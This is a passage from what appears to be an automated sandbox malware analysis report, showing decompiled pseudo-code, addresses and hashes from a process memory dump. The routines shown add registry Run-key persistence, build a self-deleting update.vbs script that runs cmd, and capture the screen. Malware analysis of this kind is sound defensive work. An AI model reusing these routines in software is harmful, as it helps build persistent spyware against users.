												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0043D5F2(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E0043D7CF(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0043D1FE(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0043D73C(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E0043D7B0(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E0043D138(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0043D4CA(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                0x0043c9a1
                0x0043c9a4
                0x0043c9a8
                0x0043c9ab
                0x0043c9af
                0x0043c9b2
                0x0043ca20
                0x0043ca23
                0x0043ca72
                0x0043ca72
                0x0043ca75
                0x0043c9e2
                0x0043c9e4
                0x0043c9e9
                0x0043c9eb
                0x0043ca90
                0x0043ca94
                0x0043ca9d
                0x0043caa2
                0x0043caa3
                0x0043caa7
                0x0043caa9
                0x0043caae
                0x0043cab1
                0x0043cab3
                0x0043cadc
                0x0043cadc
                0x0043cadf
                0x0043cae2
                0x0043cae9
                0x0043caeb
                0x0043caee
                0x0043caf0
                0x0043caf4
                0x0043caf4
                0x0043caf7
                0x0043cb02
                0x0043cb02
                0x0043cb04
                0x0043cb04
                0x0043cb06
                0x0043cb0c
                0x0043cb0c
                0x0043cb11
                0x0043cb14
                0x0043cb1f
                0x0043cb1f
                0x0043cb21
                0x0043cb21
                0x0043cb2c
                0x0043cb30
                0x0043cb30
                0x0043cb33
                0x0043cb39
                0x0043cb3b
                0x0043cb3e
                0x0043cb4e
                0x0043cb53
                0x0043cb53
                0x0043cb68
                0x0043cb6d
                0x0043cb70
                0x0043cb75
                0x0043cb78
                0x0043cb7a
                0x0043cb7c
                0x0043cb7f
                0x0043cb82
                0x0043cb8f
                0x0043cb94
                0x0043cb94
                0x0043cb82
                0x0043cb9b
                0x0043cba0
                0x0043cba3
                0x0043cba8
                0x0043cbab
                0x0043cbad
                0x0043cbba
                0x0043cbbf
                0x0043cbad
                0x0043cbc2
                0x0043cbc5
                0x0043cbca
                0x0043cbca
                0x0043cb16
                0x0043cb19
                0x00000000
                0x00000000
                0x0043cb1b
                0x00000000
                0x0043cb1b
                0x0043cb08
                0x0043cb0a
                0x00000000
                0x00000000
                0x00000000
                0x0043cb0a
                0x0043caf9
                0x0043cafc
                0x00000000
                0x00000000
                0x0043cafe
                0x00000000
                0x0043cafe
                0x0043caf2
                0x0043caf2
                0x0043caf2
                0x00000000
                0x0043caf2
                0x0043cae4
                0x0043cae7
                0x00000000
                0x00000000
                0x00000000
                0x0043cae7
                0x0043cab7
                0x0043caba
                0x0043cabc
                0x0043cac4
                0x0043cac6
                0x0043cad0
                0x0043cad2
                0x0043cad4
                0x00000000
                0x00000000
                0x0043cad6
                0x0043cada
                0x0043cada
                0x00000000
                0x0043cada
                0x0043cac8
                0x00000000
                0x0043cac8
                0x0043cabe
                0x00000000
                0x0043cabe
                0x0043ca96
                0x00000000
                0x0043ca96
                0x0043c9f1
                0x0043c9f1
                0x00000000
                0x0043c9f1
                0x0043ca7c
                0x0043ca7c
                0x0043ca7f
                0x0043ca51
                0x0043ca51
                0x0043ca52
                0x0043ca54
                0x0043ca56
                0x00000000
                0x0043ca56
                0x0043ca81
                0x0043ca84
                0x00000000
                0x00000000
                0x0043ca8a
                0x0043c9f9
                0x0043c9f9
                0x00000000
                0x0043c9f9
                0x0043ca25
                0x0043ca68
                0x00000000
                0x0043ca68
                0x0043ca27
                0x0043ca2a
                0x0043ca5d
                0x0043ca5f
                0x00000000
                0x0043ca5f
                0x0043ca2c
                0x0043ca2f
                0x0043ca4d
                0x0043ca4d
                0x0043ca4d
                0x0043ca4d
                0x00000000
                0x0043ca4d
                0x0043ca31
                0x0043ca34
                0x0043ca46
                0x00000000
                0x0043ca46
                0x0043ca36
                0x0043ca39
                0x00000000
                0x00000000
                0x0043ca3d
                0x00000000
                0x0043ca3d
                0x0043c9b4
                0x00000000
                0x00000000
                0x0043c9ba
                0x0043c9bd
                0x0043c9fd
                0x0043c9fd
                0x0043ca00
                0x0043ca19
                0x00000000
                0x0043ca19
                0x0043ca02
                0x0043ca02
                0x0043ca05
                0x00000000
                0x00000000
                0x0043ca08
                0x0043ca0b
                0x00000000
                0x00000000
                0x0043ca0d
                0x0043ca10
                0x00000000
                0x0043ca10
                0x0043c9bf
                0x0043c9f8
                0x00000000
                0x0043c9f8
                0x0043c9c4
                0x00000000
                0x00000000
                0x0043c9cd
                0x00000000
                0x00000000
                0x0043c9d2
                0x00000000
                0x00000000
                0x0043c9d7
                0x00000000
                0x00000000
                0x0043c9e0
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                • Instruction ID: a46682f6029e755382b5c6ad5a816cfbc1239a22f9056b24f3916154809a18ad
                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                • Instruction Fuzzy Hash: A25146A160064897DF34DA6894D77BF67899F1E304F18350BE582F7382C61DAD46C39E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004264BA Relevance: .2, Instructions: 187COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 94%
                			E004264BA(void* __ecx, void* __edx, signed int _a4, void* _a8, signed int _a12, void* _a16, int _a20) {
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* __edi;
				void* _t100;
				void* _t143;
				void* _t144;
				signed int* _t152;
				signed int _t187;
				signed int _t190;
				unsigned int _t192;
				unsigned int _t194;
				signed int _t195;
				signed int _t198;
				signed int* _t199;

				_t199 =  &_v48;
				asm("xorps xmm0, xmm0");
				asm("movlpd [esp+0x18], xmm0");
				_t143 = __edx;
				asm("movlpd [esp+0x24], xmm0");
				E004351E0( &_v16, __ecx + 0x124, 0x10);
				E00425661( &_v16,  &_v16);
				_t195 = _a4;
				_t100 = 0;
				if(_t195 == 0 || _t143 == 0) {
					L7:
					_t187 = _a12;
					if(_t187 == 0) {
						L14:
						_v36 = _v36 ^ (0 << 0x00000020 | _t187) << 0x3;
						_t152 =  &_v48;
						_v44 = _v44 ^ (0 << 0x00000020 | _t195) << 0x3;
						_v48 = _v48 ^ _t195 << 0x00000003;
						_v40 = _v40 ^ _t187 << 0x00000003;
						E00426351(_t152,  &_v16);
						_push(_t152);
						E00425661( &_v48,  &_v48);
						return E004351E0(_a16,  &_v48, _a20);
					}
					_t144 = _a8;
					if(_t144 == 0) {
						goto L14;
					}
					_t192 = _t187 >> 4;
					_t198 = _t187 & 0x0000000f;
					if(_t192 == 0) {
						L11:
						if(_t198 != 0) {
							E00435760(_t187,  &_v32, 0, 0x10);
							_t199 =  &(_t199[3]);
							E004351E0( &_v32, _t144, _t198);
							E00425661( &_v32,  &_v32);
							_v48 = _v48 ^ _v32;
							_v44 = _v44 ^ _v28;
							_v40 = _v40 ^ _v24;
							_v36 = _v36 ^ _v20;
							E00426351( &_v48,  &_v16);
						}
						_t195 = _a4;
						goto L14;
					} else {
						goto L10;
					}
					do {
						L10:
						E004351E0( &_v32, _t144, 0x10);
						E00425661( &_v32,  &_v32);
						_v48 = _v48 ^ _v32;
						_v44 = _v44 ^ _v28;
						_v40 = _v40 ^ _v24;
						_v36 = _v36 ^ _v20;
						E00426351( &_v48,  &_v16);
						_t144 = _t144 + 0x10;
						_t192 = _t192 - 1;
					} while (_t192 != 0);
					goto L11;
				} else {
					_t194 = _t195 >> 4;
					_t190 = _t195 & 0x0000000f;
					if(_t194 == 0) {
						L5:
						if(_t190 != 0) {
							E00435760(_t190,  &_v32, _t100, 0x10);
							_t199 =  &(_t199[3]);
							E004351E0( &_v32, _t143, _t190);
							E00425661( &_v32,  &_v32);
							_v48 = _v48 ^ _v32;
							_v44 = _v44 ^ _v28;
							_v40 = _v40 ^ _v24;
							_v36 = _v36 ^ _v20;
							E00426351( &_v48,  &_v16);
						}
						goto L7;
					} else {
						goto L3;
					}
					do {
						L3:
						E004351E0( &_v32, _t143, 0x10);
						E00425661( &_v32,  &_v32);
						_v48 = _v48 ^ _v32;
						_v44 = _v44 ^ _v28;
						_v40 = _v40 ^ _v24;
						_v36 = _v36 ^ _v20;
						E00426351( &_v48,  &_v16);
						_t143 = _t143 + 0x10;
						_t194 = _t194 - 1;
					} while (_t194 != 0);
					_t100 = 0;
					goto L5;
				}
			}
























                0x004264ba
                0x004264c7
                0x004264d1
                0x004264d8
                0x004264da
                0x004264e0
                0x004264ed
                0x004264f2
                0x004264f6
                0x004264fb
                0x004265c4
                0x004265c4
                0x004265ca
                0x0042669a
                0x004266aa
                0x004266ae
                0x004266b2
                0x004266b9
                0x004266c0
                0x004266c4
                0x004266cd
                0x004266d0
                0x004266f2
                0x004266f2
                0x004265d0
                0x004265d6
                0x00000000
                0x00000000
                0x004265e0
                0x004265e3
                0x004265e8
                0x0042663a
                0x0042663c
                0x00426647
                0x0042664c
                0x00426656
                0x00426663
                0x00426670
                0x00426678
                0x00426680
                0x00426688
                0x00426691
                0x00426691
                0x00426696
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004265ea
                0x004265ea
                0x004265f2
                0x004265ff
                0x0042660c
                0x00426614
                0x0042661c
                0x00426624
                0x0042662d
                0x00426632
                0x00426635
                0x00426635
                0x00000000
                0x00426509
                0x0042650d
                0x00426510
                0x00426515
                0x00426569
                0x0042656b
                0x00426575
                0x0042657a
                0x00426584
                0x00426591
                0x0042659e
                0x004265a6
                0x004265ae
                0x004265b6
                0x004265bf
                0x004265bf
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00426517
                0x00426517
                0x0042651f
                0x0042652c
                0x00426539
                0x00426541
                0x00426549
                0x00426551
                0x0042655a
                0x0042655f
                0x00426562
                0x00426562
                0x00426567
                0x00000000
                0x00426567

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb81251cb37eaa5e7aedacf1641149857d5b75f668e0732117be4287fcbc85c1
                • Instruction ID: a0b72adf9ff0cefad75c2eb729c64b02d8178a57de1e5a50e5e4da2a9e9bd651
                • Opcode Fuzzy Hash: cb81251cb37eaa5e7aedacf1641149857d5b75f668e0732117be4287fcbc85c1
                • Instruction Fuzzy Hash: 59615C32A083159FC304DF35E581A5FB7E5AFCC758F850E2EF49996151EB34EA088B86
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00437040 Relevance: .1, Instructions: 76COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00437040(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t8 = _t39 - 4; // 0xe82c244c
									_t32 =  *_t8 ^ _t20;
									if(_t32 == 0) {
										_t12 = _t39 - 4; // 0x40c79f
										return _t12;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											_t11 = _t39 - 3; // 0x40c7a0
											return _t11;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												_t10 = _t39 - 2; // 0x40c7a1
												return _t10;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						_t9 = _t39 - 1; // 0x40c7a2
						return _t9;
					}
				}
				L24:
			}













                0x00437040
                0x00437047
                0x0043709c
                0x0043709c
                0x00437049
                0x00437049
                0x0043704f
                0x00437059
                0x00437071
                0x00437071
                0x00437074
                0x00437088
                0x00437088
                0x0043708b
                0x00000000
                0x0043708d
                0x0043708d
                0x0043708d
                0x0043708f
                0x00437094
                0x00000000
                0x00000000
                0x00437096
                0x00437099
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00437099
                0x00000000
                0x0043708d
                0x00437076
                0x00437083
                0x004370a2
                0x004370a4
                0x004370b2
                0x004370bb
                0x00000000
                0x004370bd
                0x004370bd
                0x004370c0
                0x004370c2
                0x004370e7
                0x004370ec
                0x004370c4
                0x004370c4
                0x004370c6
                0x004370e1
                0x004370e6
                0x004370c8
                0x004370cb
                0x004370cd
                0x004370db
                0x004370e0
                0x004370cf
                0x004370d1
                0x00000000
                0x004370d3
                0x00000000
                0x004370d3
                0x004370d1
                0x004370cd
                0x004370c6
                0x004370c2
                0x00000000
                0x0043709d
                0x0043709d
                0x0043709d
                0x00000000
                0x00437087
                0x0043705b
                0x0043705b
                0x0043705b
                0x0043705d
                0x00437062
                0x00000000
                0x00000000
                0x00437064
                0x00437067
                0x00000000
                0x00437069
                0x0043706f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0043706f
                0x00000000
                0x00437067
                0x004370d6
                0x004370d6
                0x004370da
                0x004370da
                0x00437059
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction ID: 94b43a901a8d8a49cd71d2bcfdbca38c3b4e94e2fd8866408c7f20fc8d0dab54
                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction Fuzzy Hash: 8C110BF724818143D63C8A3DC4B86B7A3B5EBCE321F2CA37BD1C14B754D12B95459908
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040C929 Relevance: 49.3, APIs: 6, Strings: 22, Instructions: 281registryCOMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E0040C929(void* __edx, void* _a4) {
				char _v0;
				short _v524;
				char _v548;
				void* _v560;
				char _v576;
				void* _v584;
				char _v596;
				char _v600;
				char _v612;
				char _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v644;
				char _v648;
				char _v652;
				void* _v656;
				char _v668;
				char _v672;
				char _v676;
				void* _v680;
				char _v692;
				void* _v696;
				char _v700;
				char _v704;
				char _v708;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t67;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t213;
				void* _t244;
				void* _t246;
				void* _t247;
				void* _t248;

				_t213 = __edx;
				E00411D93();
				if( *0x46f9d4 != 0x30) {
					E0040AE1C();
				}
				_t244 =  *0x470d63 - 1; // 0x0
				if(_t244 == 0) {
					E004185EF(_t213, _t244);
				}
				if( *0x470a85 != 0) {
					E0041AC0A(E00401EE4(0x472d40), _t213);
				}
				_t230 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t246 =  *0x470b33 - 1; // 0x1
				if(_t246 == 0) {
					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
				}
				_t247 =  *0x470b30 - 1; // 0x1
				if(_t247 == 0) {
					E00412D0B(0x80000002, _t230, E00401EE4(0x473208));
				}
				_t248 =  *0x470b31 - 1; // 0x0
				if(_t248 == 0) {
					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
				}
				_t53 = E0040245C();
				_t54 = E00401F8B(0x473280);
				_t57 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t54, _t53);
				_t249 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v524, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
				_t61 = SetFileAttributesW( &_v524, 0x80);
				_t140 = 0x473250;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E00406E2B(_t249);
				_t250 = _t62;
				if(_t62 != 0) {
					_t140 = 0x473250;
					SetFileAttributesW(E00401EE4(0x473250), 0x80);
				}
				E00402FF4(_t134,  &_v600, E0040415E(_t134,  &_v668, 0x46a8f0, 0x46a8f0, E0043A99F(_t134, _t140, _t250, L"Temp")), 0, 0x46a8f0, _t250, L"\\update.vbs");
				E00401EE9();
				_t67 = E0040415E(_t134,  &_v672, _t64, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
				_t217 = L"On Error Resume Next\n";
				E004042DC(_t134,  &_v700, L"On Error Resume Next\n", 0x46a8f0, _t250, _t67);
				E00401EE9();
				_t251 = _t134;
				if(_t134 != 0) {
					_t217 = E004042DC(_t134,  &_v648, L"while fso.FileExists(\"", 0x46a8f0, _t251, E0040415E(_t134,  &_v620, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
					E0040323D(E00402FF4(_t134,  &_v672, _t109, 0, 0x46a8f0, _t251, L"\")\n"));
					E00401EE9();
					E00401EE9();
					E00401EE9();
				}
				_t236 = L"\"\n";
				E0040323D(E00402FF4(_t134,  &_v624, E00402FF4(_t134,  &_v648, E0040415E(_t134,  &_v668, _t217, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t251,  &_v524), 0, 0x46a8f0, _t251, L"\"\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				_t252 = _t134;
				if(_t134 != 0) {
					_t26 =  &_v692; // 0x465028
					L004086C6(_t134, _t26, 0, 0x46a8f0, L"wend\n");
				}
				_t220 = 0x46a8f0;
				_t78 = E00406E2B(_t252);
				_t253 = _t78;
				if(_t78 != 0) {
					_t220 = E0040AEF6( &_v644, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250);
					E0040323D(E00402FF4(0x473250,  &_v620, _t101, 0, 0x46a8f0, _t253, _t236));
					E00401EE9();
					E00401EE9();
				}
				_t79 = E0040415E(0x473250,  &_v548, _t220, 0x46a8f0, L"\"\"\", 0");
				E0040323D(E00402FF4(0x473250,  &_v628, E00402F85( &_v652, E004042FD(0x473250,  &_v676, E0040415E(0x473250,  &_v576, _t220, 0x46a8f0, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x46a8f0, _t253,  &_v0), _t79), 0, 0x46a8f0, _t253, "\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				L004086C6(0x473250,  &_v704, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E00401EE4( &_v612);
				_t93 = E0040245C();
				E00401EE4( &_v708);
				if(E0041AD6A(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v596), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EE9();
				E00401EE9();
				return E00401EE9();
			}
















































                0x0040c929
                0x0040c933
                0x0040c93f
                0x0040c941
                0x0040c941
                0x0040c949
                0x0040c94f
                0x0040c951
                0x0040c951
                0x0040c95d
                0x0040c96b
                0x0040c96b
                0x0040c975
                0x0040c97a
                0x0040c980
                0x0040c991
                0x0040c996
                0x0040c99c
                0x0040c9a2
                0x0040c9b0
                0x0040c9b5
                0x0040c9b6
                0x0040c9bc
                0x0040c9cd
                0x0040c9d2
                0x0040c9da
                0x0040c9e2
                0x0040ca09
                0x0040ca13
                0x0040ca15
                0x0040ca21
                0x0040ca21
                0x0040ca34
                0x0040ca4d
                0x0040ca5a
                0x0040ca5f
                0x0040ca61
                0x0040ca64
                0x0040ca69
                0x0040ca6b
                0x0040ca72
                0x0040ca7d
                0x0040ca7d
                0x0040ca9f
                0x0040caa9
                0x0040cab7
                0x0040cabd
                0x0040cac6
                0x0040cad0
                0x0040cad5
                0x0040cad7
                0x0040caff
                0x0040cb10
                0x0040cb19
                0x0040cb22
                0x0040cb2b
                0x0040cb2b
                0x0040cb30
                0x0040cb69
                0x0040cb72
                0x0040cb7b
                0x0040cb84
                0x0040cb89
                0x0040cb8b
                0x0040cb92
                0x0040cb96
                0x0040cb96
                0x0040cba0
                0x0040cba4
                0x0040cba9
                0x0040cbab
                0x0040cbbe
                0x0040cbcf
                0x0040cbd8
                0x0040cbe1
                0x0040cbe1
                0x0040cbf7
                0x0040cc3f
                0x0040cc48
                0x0040cc51
                0x0040cc5a
                0x0040cc66
                0x0040cc72
                0x0040cc80
                0x0040cc8a
                0x0040cc94
                0x0040cca1
                0x0040ccb3
                0x0040ccd4
                0x0040ccd4
                0x0040ccde
                0x0040cce7
                0x0040cd02

                APIs
                  • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                  • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040CA21
                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040CA34
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040CA4D
                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040CA7D
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                  • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                  • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046A8F0,00000000,00000000,0040C902,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041ADA9
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CCC8
                • ExitProcess.KERNEL32 ref: 0040CCD4
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                • String ID: """, 0$")$(PF$82G$@-G$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$P2G$P2G$P2G$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                • API String ID: 1861856835-3214438867
                • Opcode ID: e5b14d50524fe983c0e4c764485e8c2e775e618c7544e191d2b79e7aec53253f
                • Instruction ID: f36577c89e8dd83dec34a85844eba9d7716d9325f3a0deb710764ed536580f15
                • Opcode Fuzzy Hash: e5b14d50524fe983c0e4c764485e8c2e775e618c7544e191d2b79e7aec53253f
                • Instruction Fuzzy Hash: 059182712042405BC718FB62D892AEF77E99F90308F10453FF546A71E2EE789D49C69E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00417A23 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00417A23(void* __ecx, int __edx, void* __eflags) {
				signed int _v16;
				struct _ICONINFO _v132;
				signed int _v146;
				signed int _v148;
				char _v149;
				char _v152;
				signed int _v156;
				signed int _v160;
				void* _v164;
				struct HICON__* _v168;
				char _v172;
				int _v176;
				int _v180;
				int _v188;
				int _v196;
				intOrPtr _v224;
				void* _v228;
				char _v233;
				char _v236;
				struct HDC__* _v240;
				intOrPtr _v242;
				void* _v244;
				intOrPtr _v246;
				char _v248;
				intOrPtr _v250;
				signed int _v252;
				char _v256;
				char _v260;
				struct HDC__* _v268;
				void* _v284;
				void* _v296;
				struct HDC__* _v308;
				void* __ebx;
				void* __ebp;
				int _t104;
				void* _t111;
				void* _t113;
				int _t118;
				void* _t119;
				signed int _t122;
				signed char _t131;
				long _t137;
				void* _t138;
				void* _t177;
				void* _t179;
				void* _t185;
				void* _t195;
				signed int _t214;
				int _t218;
				void* _t219;
				struct HDC__* _t223;
				struct tagBITMAPINFO* _t225;
				void* _t226;
				int _t232;
				struct HDC__* _t234;

				_t215 = __edx;
				_v149 = __edx;
				_t185 = __ecx;
				_t223 = CreateDCA("DISPLAY", 0, 0, 0);
				_v160 = _t223;
				_t234 = CreateCompatibleDC(_t223);
				_t104 = E00417E84(_v16);
				_v176 = _t104;
				_t218 = _t215;
				_v168 = _t218;
				if(_t104 == 0 || _t218 == 0) {
					_t104 = E00417EC6( *((intOrPtr*)((_v16 << 4) + 0x4726b0)));
					_t218 = _t215;
					_v176 = _t104;
					_v168 = _t218;
				}
				if(_t104 == 0 || _t218 == 0) {
					L8:
					E00402073(_t185, _t185, _t215, _t234, 0x464074);
					goto L9;
				} else {
					_t215 =  &_v160;
					_v160 = _v160 & 0x00000000;
					_v156 = _v156 & 0x00000000;
					E00417EFC( *((intOrPtr*)((_v16 << 4) + 0x4726b0)),  &_v160);
					_t219 = CreateCompatibleBitmap(_t223, _v176, _t218);
					_v164 = _t219;
					if(_t219 != 0) {
						_t111 = SelectObject(_t234, _t219);
						__eflags = _t111;
						if(_t111 != 0) {
